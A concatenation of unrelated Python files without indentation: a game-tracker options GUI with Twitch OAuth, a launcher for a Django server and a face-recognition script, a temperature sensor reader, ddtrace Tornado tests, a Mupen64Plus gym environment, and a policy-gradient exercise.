self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
paddings = {"read_from_server": 5, "write_to_server": 120}
callbacks = {"read_from_server": self.read_callback,
"write_to_server": self.write_callback}
for index, opt in enumerate(["read_from_server", "write_to_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(
opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=index, pady=2, padx=paddings[opt])
c.configure(command=callbacks[opt])
if getattr(self.options, opt, False):
c.select()
next_row += 1
for index, opt in enumerate(["server_connect_label"]):
self.labels[opt] = Label(self.root, text="", width=len(
self.connection_labels["fail"]))
self.labels[opt].grid(row=next_row, pady=2,
columnspan=2, in_=tournament_settings_frame)
next_row += 1
for index, opt in enumerate(["twitch_name"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = ttk.Combobox(
tournament_settings_frame, width=40)
self.entries[opt].set(getattr(self.options, opt, ""))
self.entries[opt].bind("<<ComboboxSelected>>", self.trim_name)
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["read_delay", "trackerserver_authkey"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
def authkey_fn():
self.entries["trackerserver_authkey"].delete(0, last=END)
twitch_client_id = self.get_server_twitch_client_id()
if twitch_client_id is not None:
webbrowser.open("https://api.twitch.tv/kraken/oauth2/authorize?response_type=token&client_id=" + twitch_client_id + "&redirect_uri=" +
self.entries['trackerserver_url'].get() + "/tracker/setup&scope=", autoraise=True)
else:
# TODO: show an error
pass
self.buttons["authkey_button"] = Button(
tournament_settings_frame,
text="Get an authkey",
command=authkey_fn
)
self.buttons["authkey_button"].grid(row=next_row, column=1, pady=5)
# Check for coherency in options with priority to read
self.read_callback()
# Disable some textboxes if needed
self.checkbox_callback()
buttonframe = LabelFrame(self.root, bd=0, padx=5, pady=5)
buttonframe.grid(row=2, column=1)
# Save and cancel buttons
save = Button(
buttonframe,
text="Save",
command=self.save_callback
)
save.grid(row=0, column=0, padx=5)
cancel = Button(
buttonframe,
text="Cancel",
command=self.root.destroy
)
cancel.grid(row=0, column=1, padx=5)
# We're going to jump through a lot of hoops so we can position the options window on top of the tracker...
# ... WITHOUT going off the edge of the screen
# First we start out placing ourselves at the tracker's position
x_pos = getattr(self.options, "x_position")
y_pos = getattr(self.options, "y_position")
# Now we make ourselves invisible and fullscreen (this is a hack to measure the size and position of the monitor)
# We can't use the "screenwidth" and "screenheight" functions because they only give info on the primary display!
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.attributes("-alpha", 00)
if platform.system() == "Windows":
self.root.state("zoomed")
self.root.update()
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac. Right now this hacky logic to avoid going
# off the edge of the screen is doing who-knows-what when run on a mac.
self.root.attributes("-fullscreen", True)
# For some reason using 'update' here affects the actual window height we want to get later
self.root.update_idletasks()
# Our current width and height are now our display's width and height
screen_width = self.root.winfo_width()
screen_height = self.root.winfo_height()
# Get the upper left corner of the monitor
origin_x = self.root.winfo_x()
origin_y = self.root.winfo_y()
# Now we get out of invisible fullscreen mode
self.root.attributes("-alpha", 0xFF)
if platform.system() == "Windows":
self.root.state("normal")
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac
self.root.attributes("-fullscreen", False)
self.root.update()
# Here's the actual size of the window we're drawing
window_width = self.root.winfo_width()
window_height = self.root.winfo_height()
# Now we can make sure we don't go off the sides
max_x = origin_x + screen_width - window_width - 50
max_y = origin_y + screen_height - window_height - 50
x_pos = min(x_pos, max_x)
y_pos = min(y_pos, max_y)
# Clamp origin after clamping the other side, so that if our window is too big we lose the bottom/right instead of top/left
x_pos = max(x_pos, origin_x)
y_pos = max(y_pos, origin_y)
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.update()
self.root.focus_force()
# We're polling this queue for network results 10 times per second. This avoids blocking the main thread when we talk to the server
self.root.after(100, self.process_network_results())
# Start the main loop
mainloop()
|
launch.py
|
# multiprocess server and faceID
import multiprocessing
import time
import os
def faceRecog():
os.system("cd $GGPATH/FaceID && python3 -c 'from faceID import *; main()'")
def server():
os.system("cd $GGPATH/GGProject && python3 $GGPATH/GGProject/manage.py runserver")
if __name__ == '__main__':
proc1 = multiprocessing.Process(target=server)
proc2 = multiprocessing.Process(target=faceRecog)
proc1.start()
time.sleep(5)
proc2.start()
|
temp_sensor.py
|
try:
from w1thermsensor import W1ThermSensor
except Exception as e:
print("W1thermsensor not installed. Ok if using sim-mode")
import threading
from time import sleep
class Sensor:
def __init__(self, read_interval):
self.thread = threading.Thread(target=self._read_temp_thread)
self.read_interval = read_interval
self.sensor = W1ThermSensor()
self.temperature = self.sensor.get_temperature()
self.thread.start()
def temp(self):
return self.temperature
def _read_temp_thread(self):
while(True):
self.temperature = self.sensor.get_temperature()
sleep(self.read_interval)
|
test_safety.py
|
import threading
from nose.tools import eq_
from tornado import httpclient
from tornado.testing import gen_test
from ddtrace.contrib.tornado import patch, unpatch
from . import web
from .web.app import CustomDefaultHandler
from .utils import TornadoTestCase
class TestAsyncConcurrency(TornadoTestCase):
"""
Ensure that application instrumentation doesn't break asynchronous concurrency.
"""
@gen_test
def test_concurrent_requests(self):
# the application must handle concurrent calls
def make_requests():
# use a blocking HTTP client (we're in another thread)
http_client = httpclient.HTTPClient()
url = self.get_url('/nested/')
response = http_client.fetch(url)
eq_(200, response.code)
eq_('OK', response.body.decode('utf-8'))
# freeing file descriptors
http_client.close()
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(25)]
for t in threads:
t.daemon = True
t.start()
# wait for the execution; assuming this time as a timeout
yield web.compat.sleep(0.5)
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(25, len(traces))
eq_(2, len(traces[0]))
class TestAppSafety(TornadoTestCase):
"""
Ensure that the application patch has the proper safety guards.
"""
def test_trace_unpatch(self):
# the application must not be traced if unpatch() is called
patch()
unpatch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
def test_trace_unpatch_not_traced(self):
# the untrace must be safe if the app is not traced
unpatch()
unpatch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
def test_trace_app_twice(self):
# the application must not be traced multiple times
patch()
patch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
def test_arbitrary_resource_querystring(self):
# users inputs should not determine `span.resource` field
response = self.fetch('/success/?magic_number=42')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
request_span = traces[0][0]
eq_('tests.contrib.tornado.web.app.SuccessHandler', request_span.resource)
eq_('/success/?magic_number=42', request_span.get_tag('http.url'))
def test_arbitrary_resource_404(self):
# users inputs should not determine `span.resource` field
response = self.fetch('/does_not_exist/')
eq_(404, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
request_span = traces[0][0]
eq_('tornado.web.ErrorHandler', request_span.resource)
eq_('/does_not_exist/', request_span.get_tag('http.url'))
class TestCustomAppSafety(TornadoTestCase):
"""
Ensure that the application patch has the proper safety guards,
even for custom default handlers.
"""
def get_settings(self):
return {
'default_handler_class': CustomDefaultHandler,
'default_handler_args': dict(status_code=400),
}
def test_trace_unpatch(self):
# the application must not be traced if unpatch() is called
unpatch()
response = self.fetch('/custom_handler/')
eq_(400, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
|
mupen64plus_env.py
|
import sys
PY3_OR_LATER = sys.version_info[0] >= 3
if PY3_OR_LATER:
# Python 3 specific definitions
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
# Python 2 specific definitions
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
from contextlib import contextmanager
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
# The width, height, and depth of the emulator window:
SCR_W = 640
SCR_H = 480
SCR_D = 3
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.pixel_array = None
self._base_load_config()
self._base_validate_config()
self.frame_skip = self.config['FRAME_SKIP']
if self.frame_skip < 1:
self.frame_skip = 1
self.controller_server, self.controller_server_thread = self._start_controller_server()
self.xvfb_process, self.emulator_process = \
self._start_emulator(rom_name=self.config['ROM_NAME'],
gfx_plugin=self.config['GFX_PLUGIN'],
input_driver_path=self.config['INPUT_DRIVER_PATH'])
with self.controller_server.frame_skip_disabled():
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(SCR_H, SCR_W, SCR_D))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[ 0, 1], # A Button
[ 0, 1], # B Button
[ 0, 1], # RB Button
[ 0, 1], # LB Button
[ 0, 1], # Z Button
[ 0, 1], # C Right Button
[ 0, 1], # C Left Button
[ 0, 1], # C Down Button
[ 0, 1], # C Up Button
[ 0, 1], # D-Pad Right Button
[ 0, 1], # D-Pad Left Button
[ 0, 1], # D-Pad Down Button
[ 0, 1], # D-Pad Up Button
[ 0, 1], # Start Button
])
def _base_load_config(self):
self.config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
self._load_config()
@abc.abstractmethod
def _load_config(self):
return
def _base_validate_config(self):
if 'ROM_NAME' not in self.config:
raise AssertionError('ROM_NAME configuration is required')
if 'GFX_PLUGIN' not in self.config:
raise AssertionError('GFX_PLUGIN configuration is required')
self._validate_config()
@abc.abstractmethod
def _validate_config(self):
return
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(ControllerState(action))
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button, times=1):
for _ in itertools.repeat(None, times):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if self.config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = self.config['OFFSET_X']
offset_y = self.config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": SCR_W,
"height": SCR_H}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.pixel_array = np.flip(image_array[:, :, :3], 2)
return self.pixel_array
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if hasattr(self, 'viewer') and self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.pixel_array
if mode == 'rgb_array':
return img
elif mode == 'human':
if not hasattr(self, 'viewer') or self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(server_address = ('', self.config['PORT_NUMBER']),
control_timeout = self.config['ACTION_TIMEOUT'],
frame_skip = self.frame_skip) # TODO: Environment argument (with issue #26)
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', self.config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
gfx_plugin,
input_driver_path,
res_w=SCR_W,
res_h=SCR_H,
res_d=SCR_D):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [self.config['MUPEN_CMD'],
"--nospeedlimit",
"--nosaveoptions",
"--resolution",
"%ix%i" % (res_w, res_h),
"--gfx", gfx_plugin,
"--audio", "dummy",
"--input", input_driver_path,
rom_path]
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if self.config['USE_XVFB']:
display_num = -1
success = False
# If we couldn't find an open display number after 15 attempts, give up
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [self.config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
self.config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [self.config['VGLRUN_CMD'], "-d", ":" + str(display_num)] + cmd
cprint('Starting emulator with comand: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
if emulator is not None:
emu_return = emulator.poll()
else:
print('Emulator reference is no longer valid. Shutting down?')
return
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls [ JX, JY, A, B, RB, LB, Z, CR, CL, CD, CU, DR, DL, DD, DU, S]
NO_OP = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
START_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
A_BUTTON = [ 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
B_BUTTON = [ 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
RB_BUTTON = [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
CR_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
CL_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
CD_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
CU_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
JOYSTICK_UP = [ 0, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_DOWN = [ 0, -128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_LEFT = [-128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_RIGHT = [ 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
def __init__(self, controls=NO_OP):
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = controls[5]
self.Z_TRIG = controls[6]
self.R_CBUTTON = controls[7]
self.L_CBUTTON = controls[8]
self.D_CBUTTON = controls[9]
self.U_CBUTTON = controls[10]
self.R_DPAD = controls[11]
self.L_DPAD = controls[12]
self.D_DPAD = controls[13]
self.U_DPAD = controls[14]
self.START_BUTTON = controls[15]
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout, frame_skip):
self.control_timeout = control_timeout
self.controls = ControllerState()
self.hold_response = True
self.running = True
self.send_count = 0
self.frame_skip = frame_skip
self.frame_skip_enabled = True
self.TEXT_PLAIN_CONTENT_TYPE = "text/plain".encode()
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls):
#print('Send controls called')
self.send_count = 0
self.controls = controls
self.hold_response = False
# Wait for controls to be sent:
#start = time.time()
while not self.hold_response: # and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
super(ControllerHTTPServer, self).server_close()
# http://preshing.com/20110920/the-python-with-statement-by-example/#implementing-the-context-manager-as-a-generator
@contextmanager
def frame_skip_disabled(self):
self.frame_skip_enabled = False
yield True
self.frame_skip_enabled = True
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, fmt, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", self.server.TEXT_PLAIN_CONTENT_TYPE)
self.end_headers()
self.wfile.write(resp_data.encode())
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully (Issue #4)
self.write_response(500, "SHUTDOWN")
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.send_count += 1
# If we have sent the controls 'n' times, now we block until the next action is sent
if self.server.send_count >= self.server.frame_skip or not self.server.frame_skip_enabled:
self.server.hold_response = True
return
###############################################
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import roboschool
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
n_data = (data - np.mean(data)) / (np.std(data) + 1e-8)
return n_data * (std + 1e-8) + mean
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
out = input_placeholder
for l in range(n_layers):
out = tf.layers.dense(inputs=out, units=size, activation=activation)
out = tf.layers.dense(inputs=out, units=output_size, activation=output_activation)
return out
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
gae_lambda=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
# Observations are input for everything: sampling actions, baselines, policy gradients
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
# Actions are input when computing policy gradient updates
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Advantages are input when computing policy gradient updates
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
# Compute stochastic policy over discrete actions
sy_logits_na = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
# Sample an action from the stochastic policy
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # tf.multinomial draws samples from a multinomial distribution
# Likelihood of chosen action
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
# Compute Gaussian stochastic policy over continuous actions.
# The mean is a function of observations, while the variance is not.
sy_mean = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
sy_logstd = tf.Variable(tf.zeros([1, ac_dim]), name="policy/logstd", dtype=tf.float32)
sy_std = tf.exp(sy_logstd)
# Sample an action from the stochastic policy
sy_sampled_z = tf.random_normal(tf.shape(sy_mean)) # tf.random_normal outputs random values from a normal distribution
sy_sampled_ac = sy_mean + sy_std * sy_sampled_z
# Likelihood of chosen action
sy_z = (sy_ac_na - sy_mean) / sy_std
sy_logprob_n = -0.5 * tf.reduce_sum(tf.square(sy_z), axis=1)
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
# Loss function that we'll differentiate to get the policy gradient.
# Note: no gradient will flow through sy_adv_n, because it's a placeholder.
loss = -tf.reduce_mean(sy_logprob_n * sy_adv_n)
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(sy_ob_no, 1, "nn_baseline", n_layers=n_layers, size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
sy_target_n = tf.placeholder(shape=[None], name="target", dtype=tf.float32)
baseline_loss = tf.nn.l2_loss(baseline_prediction - sy_target_n)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
# Simulate one episode and get a path
ob = env.reset()
obs, acs, rews = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
# Feed a batch of one observatioin to get a batch of one action
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : [ob]})
ac = ac[0]
acs.append(ac)
# Simulate one time step
ob, rew, done, _ = env.step(ac)
rews.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"action" : np.array(acs),
"reward" : np.array(rews)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_nac = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t)]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_n = []
for path in paths:
q = 0
q_path = []
# Dynamic programming over reversed path
for rew in reversed(path["reward"]):
q = rew + gamma * q
q_path.append(q)
q_path.reverse()
# Append these q values
if not reward_to_go:
q_path = [q_path[0]] * len(q_path)
q_n.extend(q_path)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
